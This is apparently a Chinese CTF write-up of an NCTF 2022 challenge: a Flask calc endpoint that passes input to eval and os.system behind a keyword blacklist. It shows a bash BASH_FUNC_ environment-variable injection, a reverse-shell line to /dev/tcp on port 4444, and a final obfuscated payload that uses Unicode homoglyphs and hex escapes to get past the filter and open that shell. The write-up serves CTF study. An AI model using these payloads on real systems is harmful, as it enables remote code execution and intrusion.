环境变量注入执行任意命令

在nss上做NCTF 2022的时候发现一道很有意思的题

遂记下

源程序如下

@app.route("/calc", methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip,num)
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"
def waf(s):
    blacklist = ['import', '(', ')', '#', '@', '^', '$', ',', '>', '?', '`', ' ', '_', '|', ';', '"', '{', '}', '&',
                 'getattr', 'os', 'system', 'class', 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess',
                 'file', 'open', 'popen', 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self',
                 'item', 'getitem', 'getattribute', 'func_globals', '__init__', 'join', '__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag = False
            print(no)
            break
    return flag

这里因为在log处echo了num，因此就可以传入恶意num绕过waf并通过os.system(log)命令执行

很简单的测试代码

import time
import os
import urllib.parse

ip = '127.0.0.1'
num = urllib.parse.unquote('%0A%22whoami%22%0A')
print('num:\n'+num)
log = "echo {0} {1} {2}> log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
data = eval(num)
os.system(log)

在nss中去掉了num参数

那么预期解如下

首先看一段bash的源码

for (string_index = 0; env && (string = env[string_index++]); ) {
    name = string;
    // ...

    if (privmode == 0 && read_but_dont_execute == 0 && 
        STREQN (BASHFUNC_PREFIX, name, BASHFUNC_PREFLEN) &&
        STREQ (BASHFUNC_SUFFIX, name + char_index - BASHFUNC_SUFFLEN) &&
        STREQN ("() {", string, 4))
    {
        size_t namelen;
        char *tname;        /* desired imported function name */

        namelen = char_index - BASHFUNC_PREFLEN - BASHFUNC_SUFFLEN;

        tname = name + BASHFUNC_PREFLEN;    /* start of func name */
        tname[namelen] = '\0';      /* now tname == func name */

        string_length = strlen (string);
        temp_string = (char *)xmalloc (namelen + string_length + 2);

        memcpy (temp_string, tname, namelen);
        temp_string[namelen] = ' ';
        memcpy (temp_string + namelen + 1, string, string_length + 1);

        /* Don't import function names that are invalid identifiers from the
         environment in posix mode, though we still allow them to be defined as
         shell variables. */
        if (absolute_program (tname) == 0 && (posixly_correct == 0 || legal_identifier (tname)))
            parse_and_execute (temp_string, tname, SEVAL_NONINT|SEVAL_NOHIST|SEVAL_FUNCDEF|SEVAL_ONECMD);
        else
            free (temp_string);     /* parse_and_execute does this */
        //...
    }
}

privmode == 0，即不能传入-p参数
read_but_dont_execute == 0，即不能传入-n参数
STREQN (BASHFUNC_PREFIX, name, BASHFUNC_PREFLEN)，环境变量名前10个字符等于BASH_FUNC_
STREQ (BASHFUNC_SUFFIX, name + char_index - BASHFUNC_SUFFLEN)，环境变量名后两个字符等于%%
STREQN (“() {“, string, 4)，环境变量的值前4个字符等于() {

那么构造即可通过bash执行命令

1	env $‘BASH_FUNC_myfunc%%=() { id; }’ bash -c‘myfunc’

反弹shell方法就是

1 2	BASH_FUNC_echo%%=() {bash -i &> /dev/tcp/xxxxxxxxx/4444 0>&1} bash -c‘echo’

那么怎么写入环境变量

测试如下

# a = 1
# for a in [0]:
#     pass
# print(a)


# import os
# a={"test":'aaaa'}
# for(os.environ['test'])in['TESTTESTTEST']:pass
# print(os.environ['test'])


# import os
# a={"test":'aaaa'}
# print([[str][0]for[os.environ['test']]in[['TESTTESTTEST']]])
# print(ᵒｓ.environ['test'])

print('\x68\x65\x6c\x6c\x6f')


import os
# print(ᵒｓ.environ['yiyi'])
print([[str][0]for[os.environ['yiyi']]in[['TESTTESTTEST']]])
print(ᵒｓ.environ['yiyi'])

几个需要了解的点

python的单双引号可以解析十六进制

使用list生成器和中括号可以在变量覆盖的同时返回str

通过这种方法可以凭空构造一个不存在的变量

对于关键词过滤可以使用utf8非ascii字符格式绕过

最终的payload

[[str][0]for[ᵒｓ.environ['BASH\x5fFUNC\x5fecho%%']]in[['\x28\x29\x20\x7b\x20\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x78\x27\x78\x27\x78\x27\x78\x27\x78\x27\x78\x2f\x34\x34\x34\x34\x20\x30\x3e\x26\x31\x3b\x7d']]]